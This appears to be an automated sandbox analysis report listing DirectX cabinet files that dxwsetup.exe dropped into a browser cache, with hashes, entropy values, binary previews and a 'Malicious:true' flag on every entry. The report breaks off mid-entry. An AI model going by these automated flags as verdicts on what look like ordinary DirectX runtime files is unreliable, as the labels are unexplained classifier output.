                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Aug2007_d3dx9_35_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....0.......D...........................0....#..............s....(.........6P. .d3dx9_35_x86.cat.h.8..(.....6. .d3dx9_35.dll.\.....9....6B. .aug2007_d3dx9_35_x86.inf.....\.9....6B. .d3dx9_35_x86.inf.,...g.9....6B. .d3dx9_35_x86_xp.inf..n_.;..CK.y<.....Y.[.J.f.d.;c..l...."a..2&&[..E.BEY.EZl.%Z.(..%.+%I....3.[}...q..s?..|.w..=.s.s..y..2.S8y..........L.8.....0| .'.. .....LD.'.2'..c.ya.L.a...........C.....C.....^...T..x,.j.X....\.......2a2H.<`.`.c@. BwM(a.#..P....&[R.... $.B.....{....\....5.<$...q.t..qp..c.Z.*.J...DK...d...A@.....:t...^...X.....K...zg>......U.A..#..1v....`'d..d......A.Bf.@y.$a.d.....,.2W.=."t..........".p8.%......C.0....l.F.*.....X.Q......R.....]...c..Y.Y.<t.'...}.........gK....of...........8Gv6......O.....N!d.?...E...g3a....`...G.R2..-@.6@......\..`H$...4...&...g.6..M.........r2K.s.....FM(......}....hCJVC.T.y..@...C...d..Yk.L`....D..L....>d#.08\.h....&...&......ox...4.2......'*K....R...(E.*..@..6RH..A..t.1 ......s........).T..\.G..........w...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Aug2008_d3dx9_39_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Aug2009_d3dx11_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Dec2006_d3dx10_00_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):216015
                                                                                              Entropy (8bit):7.996946294916653
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
                                                                                              MD5:681407075E9B19E5EF2218832F6FAD71
                                                                                              SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
                                                                                              SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
                                                                                              SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....'......D............................'...#.............................5#a .d3dx10_00_x64.cat..)........}5.h .d3dx10.dll......H.....5T_ .infinst.exe......O.....5.` .d3dx10_00_x64.inf......Q.....5.` .dec2006_d3dx10_00_x64.inf......:..[.... .Vm.....%A.P...?..,..".._.R.&.F.J.J.K.^.^.*..".U.!. ...BvJ...G......(.........C~.b...V...i.Z..O.<.%. .*C...@l....a........XBq..Q.]g..2;..+d.[T[.Q..(ji..*J...........T%.E.5.o3w.;.x.p.+@...JH...JA%*.`.F..^....z..B......D.....*S. \.3....."A%'n..h.f%.E.Ue.T..61....i.....m.X.......Wu...pf.a...............G.B...........$..%....R...`K.x....U,/...aH........S..^..2....h.E.6....B.K.A..........4!@7..........2...].}...".2..Z...!V.......-.6..<...{}......*........o.~.ST.}.O.H.,....U.N.;..g{j.~a...^..7.n#.......SJ....~3}I9.\s.o....u.c;.../...RT....O~.R......L>C....W...K....P..z..........f%........::...vr.hC.Z.5...75+^...........evQ...8....v..)...W{..O/..<$....t...;. t..,&F.]&@.R..3e._.KZ.....C|../...^.p&..`\SVd.......ge..E.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Feb2006_d3dx9_29_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Mar2008_d3dx9_37_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............t.....9.......e8....d3dx9_37.dll.<'....9...e8I...d3dx9_37_x86.cat.....D.9...e8....d3dx9_37_x86.inf.,...O.9...e8....d3dx9_37_x86_xp.inf.\...{.9...e8....Mar2008_d3dx9_37_x86.inf..$.0:..[.... 92......$Q.f...>J...h.].W...uWL.I...W]J.X..V..{..Z........X.G{<..033.4..P..........ek |.b./..gFB'S...K.....fe.5.u..T<{..H....XG84QbDR.8X.Hf.H..46...H"0 ..HH.S............*.(_ ..w...H.....Q..P..vT.t@.G+...1...YH... V..Y4H..P..1R$l/..20!ls'...;....;..kmttyu...x.s....q.....q$.C..5k....(....B.r..y..<.6...Fz..hn..-.....Q.3Z...@.1.V..S?...a|....(6.......D. ....)Ej....GJ%.5 ........G.w>......p...i}..<.|..b.&!..7E.yU.O-.D......O.UC..yIA.Aj.._..D...VOc....{.f]J.<...r.)o.|-...>.PWF.....;.;..vb....4..QV'f.$......:S.hi...~...}3k......\...}a.......L5..*e....|.....1..n...T...t......[....Z.].e....d.A......'..|.V.2.|Ax..W..........B.>...x.. ..|.`...L.h..H.i.....@-.aa...7...K ...../..l.x....r...0>x..@/X...W..L..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Mar2009_d3dx9_41_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF....V.......D...........................V....#..................X.?.......i:k{..d3dx9_41.dll.....X.?...p:.r..d3dx9_41_x86.cat.......?...p:.r..d3dx9_41_x86.inf.,.....?...p:.r..d3dx9_41_x86_xp.inf.\.....?...p:.r..Mar2009_d3dx9_41_x86.inf.x..#.9..[.... .3......$Q.f...<...!..vW]....]eJ.*Uaq....a.Zk....}_..=hk..C.=...."......?1<..izt.`Y.._ .....H.`...uI35.:.,L.....I.;...........&...B......I....!@.A...A....a......................#..&.E....J..%. ......!..Q0..P.F......$.!...q..yXf..d....7,v......Y.....Q......EI.&..Rm....d.I....D........WJ...`.u..WK..K........yQo...2...W.U\.C.m...a.k.kpq.U..C.5.Hh).......<R.s.l.+.......);........%.g.g.....i..I.U.).H......l./._...<.C....a....U8.'.,.0GR....=.5....E.......jln..MKiliw..Q......,.2{..k...\.X$.......Q4..??...ns...?*....t.|.8U..>WJ./.>S..Vp.....0...3 ....'!*....,R........Ph..#.t*.7=.?p....D.....hX..H....J.`...Z.......$7t.......a...|S....(..G. ...V+`...,.X.P..lZ`...X>Bt....E*aM..(`..0......BA3..p.%..OE.c``.BU....).P5

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Aug2009_d3dx10_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\DEC2006_d3dx9_32_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Dec2005_d3dx9_28_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Dec2006_d3dx10_00_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Feb2005_d3dx9_24_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
